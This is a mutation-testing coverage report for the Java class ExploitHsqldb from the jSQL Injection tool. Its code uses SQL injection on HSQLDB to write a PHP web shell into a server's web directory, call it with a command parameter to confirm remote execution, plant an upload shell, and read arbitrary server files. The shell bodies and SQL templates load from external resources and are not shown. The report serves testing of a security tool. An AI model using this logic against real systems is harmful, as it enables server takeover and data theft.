| 1 | package com.jsql.model.accessible.vendor; | |
| 2 | ||
| 3 | import com.jsql.model.InjectionModel; | |
| 4 | import com.jsql.model.accessible.CallableFile; | |
| 5 | import com.jsql.model.accessible.DataAccess; | |
| 6 | import com.jsql.model.accessible.ResourceAccess; | |
| 7 | import com.jsql.model.accessible.vendor.hsqldb.ModelYamlHsqldb; | |
| 8 | import com.jsql.model.bean.database.MockElement; | |
| 9 | import com.jsql.model.bean.util.Interaction; | |
| 10 | import com.jsql.model.bean.util.Request; | |
| 11 | import com.jsql.model.exception.AbstractSlidingException; | |
| 12 | import com.jsql.model.exception.JSqlException; | |
| 13 | import com.jsql.model.exception.JSqlRuntimeException; | |
| 14 | import com.jsql.model.injection.vendor.model.VendorYaml; | |
| 15 | import com.jsql.model.suspendable.SuspendableGetRows; | |
| 16 | import com.jsql.util.LogLevelUtil; | |
| 17 | import com.jsql.util.StringUtil; | |
| 18 | import org.apache.commons.lang3.RandomStringUtils; | |
| 19 | import org.apache.commons.lang3.StringUtils; | |
| 20 | import org.apache.logging.log4j.LogManager; | |
| 21 | import org.apache.logging.log4j.Logger; | |
| 22 | import org.yaml.snakeyaml.Yaml; | |
| 23 | ||
| 24 | import java.io.File; | |
| 25 | import java.io.FileInputStream; | |
| 26 | import java.io.IOException; | |
| 27 | import java.io.InputStream; | |
| 28 | import java.net.http.HttpResponse; | |
| 29 | import java.util.function.BinaryOperator; | |
| 30 | ||
| 31 | public class ExploitHsqldb { | |
| 32 | ||
| 33 |     private static final Logger LOGGER = LogManager.getRootLogger(); | |
| 34 |     private final InjectionModel injectionModel; | |
| 35 |     private final ModelYamlHsqldb modelYaml; | |
| 36 | ||
| 37 |     public ExploitHsqldb(InjectionModel injectionModel) { | |
| 38 |         this.injectionModel = injectionModel; | |
| 39 |         var yaml = new Yaml(); | |
| 40 |         this.modelYaml = yaml.loadAs( | |
| 41 |             injectionModel.getMediatorVendor().getHsqldb().instance().getModelYaml().getResource().getExploit(), | |
| 42 |             ModelYamlHsqldb.class | |
| 43 |         ); | |
| 44 |     } | |
| 45 | ||
| 46 |     public String createWeb(String pathExploit, String urlExploit) { | |
| 47 |         LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge"); | |
| 48 | ||
| 49 |         String bodyExploit = StringUtil.base64Decode( | |
| 50 |                 this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB) | |
| 51 |             ) | |
| 52 |             .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) | |
| 53 |             .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); | |
| 54 | ||
| 55 |         var nameTable = RandomStringUtils.secure().nextAlphabetic(8); | |
| 56 |         var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; | |
| 57 |         this.injectionModel.injectWithoutIndex(String.format( | |
| 58 |             this.modelYaml.getFile().getWrite(), | |
| 59 |             nameTable, | |
| 60 |             nameTable, bodyExploit.replace("'", "\""), | |
| 61 |             nameTable, pathExploit + nameExploit | |
| 62 |         ), ResourceAccess.TBL_CREATE); | |
| 63 | ||
| 64 |         BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | |
| 65 |             String result = this.injectionModel.getResourceAccess().callCommand( | |
| 66 |                 urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD | |
| 67 |             ); | |
| 68 | 
1
1. lambda$createWeb$0 : negated conditional → NO_COVERAGE | 
            if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) { | 
| 69 |                 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found"); | |
| 70 |                 return StringUtils.EMPTY; | |
| 71 |             } | |
| 72 |             var request = new Request(); | |
| 73 | 
1
1. lambda$createWeb$0 : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE | 
            request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB); | 
| 74 | 
1
1. lambda$createWeb$0 : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE | 
            request.setParameters(urlSuccess); | 
| 75 | 
1
1. lambda$createWeb$0 : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE | 
            this.injectionModel.sendToViews(request); | 
| 76 | 
1
1. lambda$createWeb$0 : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitHsqldb::lambda$createWeb$0 → NO_COVERAGE | 
            return urlSuccess; | 
| 77 |         }; | |
| 78 | ||
| 79 | 
1
1. createWeb : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitHsqldb::createWeb → NO_COVERAGE | 
        return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); | 
| 80 |     } | |
| 81 | ||
| 82 |     public void createUpload(String pathExploit, String urlExploit, File fileToUpload) { | |
| 83 |         String bodyExploit = StringUtil.base64Decode( | |
| 84 |                 this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL) | |
| 85 |             ) | |
| 86 |             .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) | |
| 87 |             .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); | |
| 88 | ||
| 89 |         var nameTable = RandomStringUtils.secure().nextAlphabetic(8); | |
| 90 |         var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; | |
| 91 |         this.injectionModel.injectWithoutIndex(String.format( | |
| 92 |             this.modelYaml.getFile().getWrite(), | |
| 93 |             nameTable, | |
| 94 |             nameTable, bodyExploit.replace("'", "\""), | |
| 95 |             nameTable, pathExploit + nameExploit | |
| 96 |         ), ResourceAccess.TBL_CREATE); | |
| 97 | ||
| 98 |         BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | |
| 99 |             try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { | |
| 100 |                 HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); | |
| 101 | 
1
1. lambda$createUpload$1 : negated conditional → NO_COVERAGE | 
                if (result.body().contains(DataAccess.LEAD +"y")) { | 
| 102 |                     LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); | |
| 103 |                 } else { | |
| 104 |                     LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); | |
| 105 |                 } | |
| 106 |             } catch (InterruptedException e) { | |
| 107 |                 LOGGER.log(LogLevelUtil.IGNORE, e, e); | |
| 108 | 
1
1. lambda$createUpload$1 : removed call to java/lang/Thread::interrupt → NO_COVERAGE | 
                Thread.currentThread().interrupt(); | 
| 109 |             } catch (IOException | JSqlException e) { | |
| 110 |                 throw new JSqlRuntimeException(e); | |
| 111 |             } | |
| 112 | 
1
1. lambda$createUpload$1 : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitHsqldb::lambda$createUpload$1 → NO_COVERAGE | 
            return urlSuccess; | 
| 113 |         }; | |
| 114 | ||
| 115 |         this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); | |
| 116 |     } | |
| 117 | ||
| 118 |     public String getRead(String pathFile) throws AbstractSlidingException { | |
| 119 |         LOGGER.log(LogLevelUtil.CONSOLE_INFORM, CallableFile.REQUIRE_STACK); | |
| 120 |         var nameTable = RandomStringUtils.secure().nextAlphabetic(8); | |
| 121 |         this.injectionModel.injectWithoutIndex(String.format( | |
| 122 |             this.injectionModel.getResourceAccess().getExploitHsqldb().getModelYaml().getFile().getRead().getCreateTable(), | |
| 123 |             nameTable, | |
| 124 |             nameTable, pathFile | |
| 125 |         ), ResourceAccess.TBL_FILL); | |
| 126 | 
1
1. getRead : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitHsqldb::getRead → NO_COVERAGE | 
        return new SuspendableGetRows(this.injectionModel).run( | 
| 127 |             String.format( | |
| 128 |                 this.injectionModel.getResourceAccess().getExploitHsqldb().getModelYaml().getFile().getRead().getResult(), | |
| 129 |                 VendorYaml.TRAIL_SQL, | |
| 130 |                 nameTable | |
| 131 |             ), | |
| 132 |             new String[]{ StringUtils.EMPTY }, | |
| 133 |             false, | |
| 134 |             1, | |
| 135 |             MockElement.MOCK, | |
| 136 |             ResourceAccess.TBL_READ | |
| 137 |         ); | |
| 138 |     } | |
| 139 | ||
| 140 |     public ModelYamlHsqldb getModelYaml() { | |
| 141 | 
1
1. getModelYaml : replaced return value with null for com/jsql/model/accessible/vendor/ExploitHsqldb::getModelYaml → NO_COVERAGE | 
        return this.modelYaml; | 
| 142 |     } | |
| 143 | } | |
Mutations | ||
| 68 | 
 
 1.1  | 
|
| 73 | 
 
 1.1  | 
|
| 74 | 
 
 1.1  | 
|
| 75 | 
 
 1.1  | 
|
| 76 | 
 
 1.1  | 
|
| 79 | 
 
 1.1  | 
|
| 101 | 
 
 1.1  | 
|
| 108 | 
 
 1.1  | 
|
| 112 | 
 
 1.1  | 
|
| 126 | 
 
 1.1  | 
|
| 141 | 
 
 1.1  |